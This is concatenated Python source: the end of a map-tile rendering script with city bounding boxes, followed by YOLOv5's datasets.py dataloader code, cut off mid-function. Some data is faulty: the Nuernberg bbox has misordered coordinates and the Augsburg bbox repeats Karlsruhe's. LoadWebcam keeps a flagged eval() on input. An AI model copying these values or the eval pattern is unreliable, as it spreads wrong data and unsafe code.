if not tile_dir.endswith('/'):
tile_dir = tile_dir + '/'
#-------------------------------------------------------------------------
#
# Change the following for different bounding boxes and zoom levels
#
# Start with an overview
# World
bbox = (-180.0,-90.0, 180.0,90.0)
render_tiles(bbox, mapfile, tile_dir, 0, 5, "World")
minZoom = 10
maxZoom = 16
bbox = (-2, 50.0,1.0,52.0)
render_tiles(bbox, mapfile, tile_dir, minZoom, maxZoom)
# Muenchen
bbox = (11.4,48.07, 11.7,48.22)
render_tiles(bbox, mapfile, tile_dir, 1, 12 , "Muenchen")
# Muenchen+
bbox = (11.3,48.01, 12.15,48.44)
render_tiles(bbox, mapfile, tile_dir, 7, 12 , "Muenchen+")
# Muenchen++
bbox = (10.92,47.7, 12.24,48.61)
render_tiles(bbox, mapfile, tile_dir, 7, 12 , "Muenchen++")
# Nuernberg
bbox=(10.903198,49.560441,49.633534,11.038085)
render_tiles(bbox, mapfile, tile_dir, 10, 16, "Nuernberg")
# Karlsruhe
bbox=(8.179113,48.933617,8.489252,49.081707)
render_tiles(bbox, mapfile, tile_dir, 10, 16, "Karlsruhe")
# Karlsruhe+
bbox = (8.3,48.95,8.5,49.05)
render_tiles(bbox, mapfile, tile_dir, 1, 16, "Karlsruhe+")
# Augsburg
bbox = (8.3,48.95,8.5,49.05)
render_tiles(bbox, mapfile, tile_dir, 1, 16, "Augsburg")
# Augsburg+
bbox=(10.773251,48.369594,10.883834,48.438577)
render_tiles(bbox, mapfile, tile_dir, 10, 14, "Augsburg+")
# Europe+
bbox = (1.0,10.0, 20.6,50.0)
render_tiles(bbox, mapfile, tile_dir, 1, 11 , "Europe+")
"""
|
datasets.py
|
# YOLOv5 dataset utils and dataloaders
import glob
import hashlib
import json
import logging
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool, Pool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import check_requirements, check_file, check_dataset, xywh2xyxy, xywhn2xyxy, xyxy2xywhn, \
xyn2xy, segments2boxes, clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
NUM_THREADS = min(8, os.cpu_count()) # number of multiprocessing threads
# Get orientation exif tag
# Resolve the numeric EXIF tag id whose name is 'Orientation'; the loop
# variable `orientation` keeps that id afterwards and is read by exif_size().
for orientation in ExifTags.TAGS.keys():
    if ExifTags.TAGS[orientation] == 'Orientation':
        break
def get_hash(paths):
    """Return one md5 hex digest covering a list of file/dir paths:
    the combined on-disk size of the existing paths plus the joined path
    strings themselves."""
    total_size = sum(os.path.getsize(p) for p in paths if os.path.exists(p))
    digest = hashlib.md5(str(total_size).encode())
    digest.update(''.join(paths).encode())
    return digest.hexdigest()
def exif_size(img):
    """Return the EXIF-corrected (width, height) of a PIL image.

    Orientations 6 and 8 (90/270-degree rotations) swap width and height;
    any failure to read the EXIF data falls back to the raw size.
    """
    s = img.size  # (width, height)
    try:
        rotation = dict(img._getexif().items())[orientation]
        if rotation == 6:  # rotation 270
            s = (s[1], s[0])
        elif rotation == 8:  # rotation 90
            s = (s[1], s[0])
    except (AttributeError, KeyError, IndexError, TypeError):
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt are
        # no longer swallowed; missing/malformed EXIF (e.g. _getexif() absent
        # or returning None, or no Orientation tag) still falls through to
        # the uncorrected size.
        pass
    return s
def exif_transpose(image):
    """
    Transpose a PIL image accordingly if it has an EXIF Orientation tag.
    From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
    :param image: The image to transpose.
    :return: An image.
    """
    exif = image.getexif()
    orientation = exif.get(0x0112, 1)  # 0x0112 is the EXIF Orientation tag; 1 = upright
    if orientation <= 1:
        # Already upright (or no tag): nothing to do.
        return image
    transposition = {2: Image.FLIP_LEFT_RIGHT,
                     3: Image.ROTATE_180,
                     4: Image.FLIP_TOP_BOTTOM,
                     5: Image.TRANSPOSE,
                     6: Image.ROTATE_270,
                     7: Image.TRANSVERSE,
                     8: Image.ROTATE_90,
                     }.get(orientation)
    if transposition is not None:
        image = image.transpose(transposition)
        # Strip the tag so the corrected image is not rotated a second time.
        del exif[0x0112]
        image.info["exif"] = exif.tobytes()
    return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
                      rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
    """Build a LoadImagesAndLabels dataset and a dataloader over it; returns
    (dataloader, dataset)."""
    # In DDP, let rank 0 build/cache the dataset first; the other ranks then
    # reuse its cache instead of re-scanning the data.
    with torch_distributed_zero_first(rank):
        dataset = LoadImagesAndLabels(path, imgsz, batch_size,
                                      augment=augment,  # augment images
                                      hyp=hyp,  # augmentation hyperparameters
                                      rect=rect,  # rectangular training
                                      cache_images=cache,
                                      single_cls=single_cls,
                                      stride=int(stride),
                                      pad=pad,
                                      image_weights=image_weights,
                                      prefix=prefix)

    batch_size = min(batch_size, len(dataset))
    num_workers = min([os.cpu_count(), batch_size if batch_size > 1 else 0, workers])
    ddp_sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
    # The vanilla DataLoader is required when dataset attributes (image
    # weights) must be re-read each epoch; InfiniteDataLoader reuses workers.
    loader_cls = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
    dataloader = loader_cls(dataset,
                            batch_size=batch_size,
                            num_workers=num_workers,
                            sampler=ddp_sampler,
                            pin_memory=True,
                            collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
    return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
    """Dataloader that reuses workers.

    Same call syntax as the vanilla DataLoader, but the batch sampler is
    wrapped so it repeats forever and a single persistent iterator is used,
    keeping worker processes alive across epochs.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # DataLoader treats batch_sampler as read-only after __init__, so the
        # repeating wrapper has to be installed via object.__setattr__.
        object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
        self.iterator = super().__iter__()

    def __len__(self):
        return len(self.batch_sampler.sampler)

    def __iter__(self):
        # Yield exactly one epoch's worth of batches from the endless iterator.
        for _ in range(len(self)):
            yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:  # for inference
    """Iterator over a path (single file, directory, or glob pattern) that
    yields (path, letterboxed_CHW_RGB_img, original_BGR_img, video_capture)
    tuples for inference. Handles both image and video files."""

    def __init__(self, path, img_size=640, stride=32):
        p = str(Path(path).absolute())  # os-agnostic absolute path
        if '*' in p:
            files = sorted(glob.glob(p, recursive=True))  # glob
        elif os.path.isdir(p):
            files = sorted(glob.glob(os.path.join(p, '*.*')))  # dir
        elif os.path.isfile(p):
            files = [p]  # files
        else:
            raise Exception(f'ERROR: {p} does not exist')

        # Split the file list by extension into images and videos.
        images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
        videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
        ni, nv = len(images), len(videos)

        self.img_size = img_size
        self.stride = stride
        self.files = images + videos  # images first, then videos
        self.nf = ni + nv  # number of files
        self.video_flag = [False] * ni + [True] * nv  # parallel to self.files
        self.mode = 'image'
        if any(videos):
            self.new_video(videos[0])  # new video: open the first one up front
        else:
            self.cap = None
        assert self.nf > 0, f'No images or videos found in {p}. ' \
                            f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'

    def __iter__(self):
        self.count = 0
        return self

    def __next__(self):
        if self.count == self.nf:
            raise StopIteration
        path = self.files[self.count]

        if self.video_flag[self.count]:
            # Read the next frame of the current video.
            self.mode = 'video'
            ret_val, img0 = self.cap.read()
            if not ret_val:
                # Current video exhausted: advance to the next file.
                self.count += 1
                self.cap.release()
                if self.count == self.nf:  # last video
                    raise StopIteration
                else:
                    path = self.files[self.count]
                    self.new_video(path)
                    ret_val, img0 = self.cap.read()

            self.frame += 1
            print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: ', end='')

        else:
            # Read image
            self.count += 1
            img0 = cv2.imread(path)  # BGR
            assert img0 is not None, 'Image Not Found ' + path
            print(f'image {self.count}/{self.nf} {path}: ', end='')

        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride)[0]

        # Convert
        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB
        img = np.ascontiguousarray(img)

        return path, img, img0, self.cap

    def new_video(self, path):
        # Open `path` and reset per-video frame bookkeeping.
        self.frame = 0
        self.cap = cv2.VideoCapture(path)
        self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))

    def __len__(self):
        return self.nf  # number of files
class LoadWebcam:  # for inference
    """Iterator over a local webcam (or pipe/URL) that yields
    ('webcam.jpg', letterboxed_CHW_RGB_img, original_BGR_frame, None)
    tuples until the user presses 'q'."""

    def __init__(self, pipe='0', img_size=640, stride=32):
        self.img_size = img_size
        self.stride = stride
        # A numeric string selects a local camera index; anything else is
        # passed to OpenCV as-is (e.g. a URL or GStreamer pipeline).
        # NOTE(review): eval() is risky on untrusted input; int(pipe) would do.
        self.pipe = eval(pipe) if pipe.isnumeric() else pipe
        self.cap = cv2.VideoCapture(self.pipe)  # video capture object
        self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3)  # set buffer size

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
        if cv2.waitKey(1) == ord('q'):  # q to quit
            self.cap.release()
            cv2.destroyAllWindows()
            raise StopIteration

        # Read frame
        ret_val, img0 = self.cap.read()
        img0 = cv2.flip(img0, 1)  # flip left-right (mirror view)

        # Print
        assert ret_val, f'Camera Error {self.pipe}'
        img_path = 'webcam.jpg'
        print(f'webcam {self.count}: ', end='')

        # Padded resize
        img = letterbox(img0, self.img_size, stride=self.stride)[0]

        # Convert
        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB
        img = np.ascontiguousarray(img)

        return img_path, img, img0, None

    def __len__(self):
        # A live stream has no predetermined length.
        return 0
class LoadStreams:  # multiple IP or RTSP cameras
    """Iterator over synchronized frames from multiple video streams.

    One daemon thread per source keeps the newest frame in ``self.imgs``;
    ``__next__`` letterboxes and stacks the current frames into one batch.
    *sources* is either a text file with one stream URL per line or a single
    URL / webcam-id string.
    """

    def __init__(self, sources='streams.txt', img_size=640, stride=32):
        self.mode = 'stream'
        self.img_size = img_size
        self.stride = stride

        if os.path.isfile(sources):
            with open(sources, 'r') as f:
                sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
        else:
            sources = [sources]

        n = len(sources)
        self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
        self.sources = [clean_str(x) for x in sources]  # clean source names for later
        for i, s in enumerate(sources):  # index, source
            # Start thread to read frames from video stream
            print(f'{i + 1}/{n}: {s}... ', end='')
            if 'youtube.com/' in s or 'youtu.be/' in s:  # if source is YouTube video
                check_requirements(('pafy', 'youtube_dl'))
                import pafy
                s = pafy.new(s).getbest(preftype="mp4").url  # YouTube URL
            # Use int(), not eval(): isnumeric() guarantees int() parses it, and
            # eval() would execute an attacker-controlled source string as code.
            s = int(s) if s.isnumeric() else s  # i.e. s = '0' local webcam
            cap = cv2.VideoCapture(s)
            assert cap.isOpened(), f'Failed to open {s}'
            w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
            h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
            self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0  # 30 FPS fallback
            self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf')  # infinite stream fallback

            _, self.imgs[i] = cap.read()  # guarantee first frame
            self.threads[i] = Thread(target=self.update, args=([i, cap]), daemon=True)
            print(f" success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
            self.threads[i].start()
        print('')  # newline

        # check for common shapes
        s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0)  # shapes
        self.rect = np.unique(s, axis=0).shape[0] == 1  # rect inference if all shapes equal
        if not self.rect:
            print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')

    def update(self, i, cap):
        # Read stream `i` frames in daemon thread
        n, f, read = 0, self.frames[i], 1  # frame number, frame array, inference every 'read' frame
        while cap.isOpened() and n < f:
            n += 1
            # _, self.imgs[index] = cap.read()
            cap.grab()
            if n % read == 0:
                success, im = cap.retrieve()
                # On a failed retrieve keep an all-zero frame of the same shape.
                self.imgs[i] = im if success else self.imgs[i] * 0
            time.sleep(1 / self.fps[i])  # wait time

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
        # Stop when any reader thread died or the user pressed 'q'.
        if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'):  # q to quit
            cv2.destroyAllWindows()
            raise StopIteration

        # Letterbox
        img0 = self.imgs.copy()
        img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]

        # Stack
        img = np.stack(img, 0)

        # Convert
        img = img[..., ::-1].transpose((0, 3, 1, 2))  # BGR to RGB, BHWC to BCHW
        img = np.ascontiguousarray(img)

        return self.sources, img, img0, None

    def __len__(self):
        return len(self.sources)  # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
    """Map each image path to its label path.

    Swaps the last ``/images/`` directory component for ``/labels/`` and
    replaces the file extension with ``.txt``.
    """
    img_dir = os.sep + 'images' + os.sep
    lbl_dir = os.sep + 'labels' + os.sep
    label_paths = []
    for p in img_paths:
        swapped = lbl_dir.join(p.rsplit(img_dir, 1))  # swap only the last occurrence
        label_paths.append(swapped.rsplit('.', 1)[0] + '.txt')
    return label_paths
class LoadImagesAndLabels(Dataset):  # for training/testing
    """Dataset of images + YOLO-format labels for training/testing.

    Fixes vs. previous revision: ``astype(np.int)`` replaced with
    ``astype(int)`` (the ``np.int`` alias is removed in NumPy >= 1.24),
    the bare ``except:`` on cache loading narrowed to ``except Exception``
    (a bare except also swallows KeyboardInterrupt/SystemExit), and a
    leftover debug ``print`` removed from :meth:`cache_labels`.
    """

    def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
                 cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
        self.img_size = img_size
        self.augment = augment
        self.hyp = hyp
        self.image_weights = image_weights
        self.rect = False if image_weights else rect
        self.mosaic = self.augment and not self.rect  # load 4 images at a time into a mosaic (only during training)
        self.mosaic_border = [-img_size // 2, -img_size // 2]
        self.stride = stride
        self.path = path
        self.albumentations = Albumentations() if augment else None

        # Gather image files from directories and/or list files.
        try:
            f = []  # image files
            for p in path if isinstance(path, list) else [path]:
                p = Path(p)  # os-agnostic
                if p.is_dir():  # dir
                    f += glob.glob(str(p / '**' / '*.*'), recursive=True)
                elif p.is_file():  # file
                    with open(p, 'r') as t:
                        t = t.read().strip().splitlines()
                        parent = str(p.parent) + os.sep
                        f += [x.replace('./', parent) if x.startswith('./') else x for x in t]  # local to global path
                else:
                    raise Exception(f'{prefix}{p} does not exist')
            self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS])
            assert self.img_files, f'{prefix}No images found'
        except Exception as e:
            raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')

        # Check cache
        self.label_files = img2label_paths(self.img_files)  # labels
        cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
        try:
            cache, exists = np.load(cache_path, allow_pickle=True).item(), True  # load dict
            assert cache['version'] == 0.4 and cache['hash'] == get_hash(self.label_files + self.img_files)
        except Exception:
            # Missing/stale/incompatible cache: rebuild it from scratch.
            cache, exists = self.cache_labels(cache_path, prefix), False  # cache

        # Display cache
        nf, nm, ne, nc, n = cache.pop('results')  # found, missing, empty, corrupted, total
        if exists:
            d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
            tqdm(None, desc=prefix + d, total=n, initial=n)  # display cache results
            if cache['msgs']:
                logging.info('\n'.join(cache['msgs']))  # display warnings
        assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'

        # Read cache
        [cache.pop(k) for k in ('hash', 'version', 'msgs')]  # remove items
        labels, shapes, self.segments = zip(*cache.values())
        self.labels = list(labels)
        self.shapes = np.array(shapes, dtype=np.float64)
        self.img_files = list(cache.keys())  # update
        self.label_files = img2label_paths(cache.keys())  # update
        if single_cls:
            for x in self.labels:
                x[:, 0] = 0

        n = len(shapes)  # number of images
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index (np.int alias removed in NumPy >= 1.24)
        nb = bi[-1] + 1  # number of batches
        self.batch = bi  # batch index of image
        self.n = n
        self.indices = range(n)

        # Rectangular Training
        if self.rect:
            # Sort by aspect ratio
            s = self.shapes  # wh
            ar = s[:, 1] / s[:, 0]  # aspect ratio
            irect = ar.argsort()
            self.img_files = [self.img_files[i] for i in irect]
            self.label_files = [self.label_files[i] for i in irect]
            self.labels = [self.labels[i] for i in irect]
            self.shapes = s[irect]  # wh
            ar = ar[irect]

            # Set training image shapes
            shapes = [[1, 1]] * nb
            for i in range(nb):
                ari = ar[bi == i]
                mini, maxi = ari.min(), ari.max()
                if maxi < 1:
                    shapes[i] = [maxi, 1]
                elif mini > 1:
                    shapes[i] = [1, 1 / mini]

            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride

        # Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
        self.imgs, self.img_npy = [None] * n, [None] * n
        if cache_images:
            if cache_images == 'disk':
                self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
                self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
                self.im_cache_dir.mkdir(parents=True, exist_ok=True)
            gb = 0  # Gigabytes of cached images
            self.img_hw0, self.img_hw = [None] * n, [None] * n
            results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
            pbar = tqdm(enumerate(results), total=n)
            for i, x in pbar:
                if cache_images == 'disk':
                    if not self.img_npy[i].exists():
                        np.save(self.img_npy[i].as_posix(), x[0])
                    gb += self.img_npy[i].stat().st_size
                else:
                    self.imgs[i], self.img_hw0[i], self.img_hw[i] = x  # im, hw_orig, hw_resized = load_image(self, i)
                    gb += self.imgs[i].nbytes
                pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
            pbar.close()

    def cache_labels(self, path=Path('./labels.cache'), prefix=''):
        """Cache dataset labels, check images and read shapes.

        Returns the cache dict; also writes it to *path* when writable.
        """
        x = {}  # dict
        nm, nf, ne, nc, msgs = 0, 0, 0, 0, []  # number missing, found, empty, corrupt, messages
        desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
        # NOTE(review): Pool(1) serializes verification — presumably deliberate
        # here (upstream uses NUM_THREADS); confirm before parallelizing.
        with Pool(1) as pool:
            pbar = tqdm(pool.imap_unordered(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
                        desc=desc, total=len(self.img_files))
            for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
                nm += nm_f
                nf += nf_f
                ne += ne_f
                nc += nc_f
                if im_file:
                    x[im_file] = [l, shape, segments]
                if msg:
                    msgs.append(msg)
                pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
        pbar.close()
        if msgs:
            logging.info('\n'.join(msgs))
        if nf == 0:
            logging.info(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
        x['hash'] = get_hash(self.label_files + self.img_files)
        x['results'] = nf, nm, ne, nc, len(self.img_files)
        x['msgs'] = msgs  # warnings
        x['version'] = 0.4  # cache version
        try:
            np.save(path, x)  # save cache for next time
            path.with_suffix('.cache.npy').rename(path)  # remove .npy suffix
            logging.info(f'{prefix}New cache created: {path}')
        except Exception as e:
            logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}')  # path not writeable
        return x

    def __len__(self):
        return len(self.img_files)

    def __getitem__(self, index):
        """Return (CHW/RGB image tensor, labels (n, 6), image path, shapes)."""
        index = self.indices[index]  # linear, shuffled, or image_weights

        hyp = self.hyp
        mosaic = self.mosaic and random.random() < hyp['mosaic']
        if mosaic:
            # Load mosaic
            img, labels = load_mosaic(self, index)
            shapes = None

            # MixUp augmentation
            if random.random() < hyp['mixup']:
                img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))

        else:
            # Load image
            img, (h0, w0), (h, w) = load_image(self, index)

            # Letterbox
            shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size  # final letterboxed shape
            img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
            shapes = (h0, w0), ((h / h0, w / w0), pad)  # for COCO mAP rescaling

            labels = self.labels[index].copy()
            if labels.size:  # normalized xywh to pixel xyxy format
                labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])

            if self.augment:
                img, labels = random_perspective(img, labels,
                                                 degrees=hyp['degrees'],
                                                 translate=hyp['translate'],
                                                 scale=hyp['scale'],
                                                 shear=hyp['shear'],
                                                 perspective=hyp['perspective'])

        nl = len(labels)  # number of labels
        if nl:
            labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)

        if self.augment:
            # Albumentations
            img, labels = self.albumentations(img, labels)

            # HSV color-space
            augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])

            # Flip up-down
            if random.random() < hyp['flipud']:
                img = np.flipud(img)
                if nl:
                    labels[:, 2] = 1 - labels[:, 2]

            # Flip left-right
            if random.random() < hyp['fliplr']:
                img = np.fliplr(img)
                if nl:
                    labels[:, 1] = 1 - labels[:, 1]

        labels_out = torch.zeros((nl, 6))  # column 0 is filled by collate_fn with the image index
        if nl:
            labels_out[:, 1:] = torch.from_numpy(labels)

        # Convert
        img = img.transpose((2, 0, 1))[::-1]  # HWC to CHW, BGR to RGB
        img = np.ascontiguousarray(img)

        return torch.from_numpy(img), labels_out, self.img_files[index], shapes

    @staticmethod
    def collate_fn(batch):
        """Stack images; concat labels, writing the in-batch image index to column 0."""
        img, label, path, shapes = zip(*batch)  # transposed
        for i, l in enumerate(label):
            l[:, 0] = i  # add target image index for build_targets()
        return torch.stack(img, 0), torch.cat(label, 0), path, shapes

    @staticmethod
    def collate_fn4(batch):
        """Quad collate: merge groups of 4 samples into one (2x upsample or 2x2 tile)."""
        img, label, path, shapes = zip(*batch)  # transposed
        n = len(shapes) // 4
        img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]

        ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
        wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
        s = torch.tensor([[1, 1, .5, .5, .5, .5]])  # scale
        for i in range(n):  # zidane torch.zeros(16,3,720,1280)  # BCHW
            i *= 4
            if random.random() < 0.5:
                im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
                    0].type(img[i].type())
                l = label[i]
            else:
                im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
                l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
            img4.append(im)
            label4.append(l)

        for i, l in enumerate(label4):
            l[:, 0] = i  # add target image index for build_targets()

        return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
    """Return dataset image *i* as ``(im, (h0, w0), (h, w))``.

    ``(h0, w0)`` is the original size, ``(h, w)`` the resized size. Serves
    from the RAM cache when available, otherwise from the .npy disk cache or
    by decoding the image file, resizing so the long side equals img_size.
    """
    cached = self.imgs[i]
    if cached is not None:  # already loaded, resized and cached in RAM
        return cached, self.img_hw0[i], self.img_hw[i]

    npy = self.img_npy[i]
    if npy and npy.exists():  # disk-cached numpy array
        im = np.load(npy)
    else:  # decode the original image file
        path = self.img_files[i]
        im = cv2.imread(path)  # BGR
        assert im is not None, 'Image Not Found ' + path
    h0, w0 = im.shape[:2]  # orig hw
    ratio = self.img_size / max(h0, w0)
    if ratio != 1:  # scale the long side to img_size
        interp = cv2.INTER_AREA if ratio < 1 and not self.augment else cv2.INTER_LINEAR
        im = cv2.resize(im, (int(w0 * ratio), int(h0 * ratio)), interpolation=interp)
    return im, (h0, w0), im.shape[:2]  # im, hw_original, hw_resized
def load_mosaic(self, index):
    """Build a 4-image mosaic around image *index*; returns (img4, labels4).

    A 2s x 2s canvas is filled with 4 tiles meeting at a random center
    (xc, yc); labels are converted to pixel xyxy in mosaic coordinates,
    clipped, then augmented with copy_paste and random_perspective.
    """
    # loads images in a 4-mosaic
    labels4, segments4 = [], []
    s = self.img_size
    yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border]  # mosaic center x, y
    indices = [index] + random.choices(self.indices, k=3)  # 3 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img4: (x1a..y2a) is the slot on the big canvas,
        # (x1b..y2b) the matching region of the source image.
        if i == 0:  # top left
            img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc  # xmin, ymin, xmax, ymax (large image)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h  # xmin, ymin, xmax, ymax (small image)
        elif i == 1:  # top right
            x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
            x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
        elif i == 2:  # bottom left
            x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
        elif i == 3:  # bottom right
            x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)

        img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # img4[ymin:ymax, xmin:xmax]
        padw = x1a - x1b
        padh = y1a - y1b

        # Labels
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh)  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
        labels4.append(labels)
        segments4.extend(segments)

    # Concat/clip labels
    labels4 = np.concatenate(labels4, 0)
    for x in (labels4[:, 1:], *segments4):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()

    # Augment
    img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
    img4, labels4 = random_perspective(img4, labels4, segments4,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove

    return img4, labels4
def load_mosaic9(self, index):
    """Build a 9-image (3x3) mosaic around image *index*; returns (img9, labels9).

    Tiles are placed clockwise around the center image on a 3s x 3s canvas,
    then a random 2s x 2s crop is taken and augmented.
    """
    # loads images in a 9-mosaic
    labels9, segments9 = [], []
    s = self.img_size
    indices = [index] + random.choices(self.indices, k=8)  # 8 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img9: c is the tile's (xmin, ymin, xmax, ymax) on the canvas.
        if i == 0:  # center
            img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            h0, w0 = h, w
            c = s, s, s + w, s + h  # xmin, ymin, xmax, ymax (base) coordinates
        elif i == 1:  # top
            c = s, s - h, s + w, s
        elif i == 2:  # top right
            # hp/wp hold the previous tile's size; they are assigned at the end
            # of every iteration, so they are defined by the time i >= 2 reads them.
            c = s + wp, s - h, s + wp + w, s
        elif i == 3:  # right
            c = s + w0, s, s + w0 + w, s + h
        elif i == 4:  # bottom right
            c = s + w0, s + hp, s + w0 + w, s + hp + h
        elif i == 5:  # bottom
            c = s + w0 - w, s + h0, s + w0, s + h0 + h
        elif i == 6:  # bottom left
            c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
        elif i == 7:  # left
            c = s - w, s + h0 - h, s, s + h0
        elif i == 8:  # top left
            c = s - w, s + h0 - hp - h, s, s + h0 - hp

        padx, pady = c[:2]
